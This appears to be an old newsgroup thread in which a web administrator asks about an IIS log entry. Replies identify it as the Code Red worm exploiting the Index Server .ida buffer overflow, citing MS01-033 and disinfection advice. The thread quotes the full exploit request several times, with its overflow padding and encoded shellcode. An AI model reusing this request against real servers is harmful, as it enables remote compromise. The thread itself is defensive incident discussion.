Index Server Attack on IIS

[Savage]

Here is the log from an attack. What can be achomplished by this attack?
/default.ida?%20nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn%u9090%u6858%ucb
d3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b 00%u531b%u53ff%u0078%u0000%u00=a/

The log produces a 200 response. Which means file found. There is no default.ida
on the server, I searched and nothing came up.
A error is produced "FILE. error ..."

Can the attacker gain access this way?
Thanks for any help.
Savage

[Savage]

I went to Microsofts web site . The have a page on securing a web server.
I Did the following:
In IIS under the web site I clicked properties and under home directory I
clicked configure. I removed the reference to .ida files.

Then the attack came again. This time the hacker was given a response of
404 "file not found". I got at least 15 attacks from 15 different IP addresses.
This may be a trojan program running on unsuppecting machines. Is there any
way to track down these machines? OR Find out who is sending this data?
Thanks
Savage

"Savage" <vondras@enteract.com> wrote:
>
>Here is the log from an attack. What can be achomplished by this attack?
>/default.ida?%20nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8 b00%u531b%u53ff%u0078%u0000%u00=a/
>
>The log produces a 200 response. Which means file found. There is no default.ida
>on the server, I searched and nothing came up.
>A error is produced "FILE. error ..."
>
>Can the attacker gain access this way?
>Thanks for any help.
>Savage

[Don Bevis]

This may be the "unchecked buffer" hole, being exploited by the Code Red
worm:

http://www.microsoft.com/technet/sec...n/MS01-033.asp


"Savage" <vondras@enteract.com> wrote in message
news:3b575956$1@news.devx.com...
>
> I went to Microsofts web site . The have a page on securing a web server.
> I Did the following:
> In IIS under the web site I clicked properties and under home directory I
> clicked configure. I removed the reference to .ida files.
>
> Then the attack came again. This time the hacker was given a response of
> 404 "file not found". I got at least 15 attacks from 15 different IP
addresses.
> This may be a trojan program running on unsuppecting machines. Is there
any
> way to track down these machines? OR Find out who is sending this data?
> Thanks
> Savage
>
> "Savage" <vondras@enteract.com> wrote:
> >
> >Here is the log from an attack. What can be achomplished by this attack?
>
>/default.ida?%20nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
nnnnnnnnnnnnn%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a/
> >
> >The log produces a 200 response. Which means file found. There is no
default.ida
> >on the server, I searched and nothing came up.
> >A error is produced "FILE. error ..."
> >
> >Can the attacker gain access this way?
> >Thanks for any help.
> >Savage
>

[Michael Howard]

looks like code red.


"Savage" <vondras@enteract.com> wrote:
>
>Here is the log from an attack. What can be achomplished by this attack?
>/default.ida?%20nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8 b00%u531b%u53ff%u0078%u0000%u00=a/
>
>The log produces a 200 response. Which means file found. There is no default.ida
>on the server, I searched and nothing came up.
>A error is produced "FILE. error ..."
>
>Can the attacker gain access this way?
>Thanks for any help.
>Savage

[conny]

Looks like the famos code red worm (Version1) witch will also
affect your Server if...

* you installed your WEB Server (Port 80) on a Windows 2000 IIS
* you dit not fixed the secure hole in Index Server (default.ida)


(My logfiles are looking the same except the space after the questionmark
...?%20nnn and my´n 'n´s' are in uppercase.

Your logfiles now may also show requests like
...default.ida?XXXXX...
this is the new Version of code red (Version 2)
The error message of Version 1 and 2 are not simmilar.
Version 1 will raise the 'malformed header' error and
Version 2 the 'file not found' code
You can find out how to disinfect at the NAV (norton antivir) homepage.
www.symantec.com/search

regards
Conny


"Savage" <vondras@enteract.com> wrote:
>
>Here is the log from an attack. What can be achomplished by this attack?
>/default.ida?%20nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8 b00%u531b%u53ff%u0078%u0000%u00=a/
>
>The log produces a 200 response. Which means file found. There is no default.ida
>on the server, I searched and nothing came up.
>A error is produced "FILE. error ..."
>
>Can the attacker gain access this way?
>Thanks for any help.
>Savage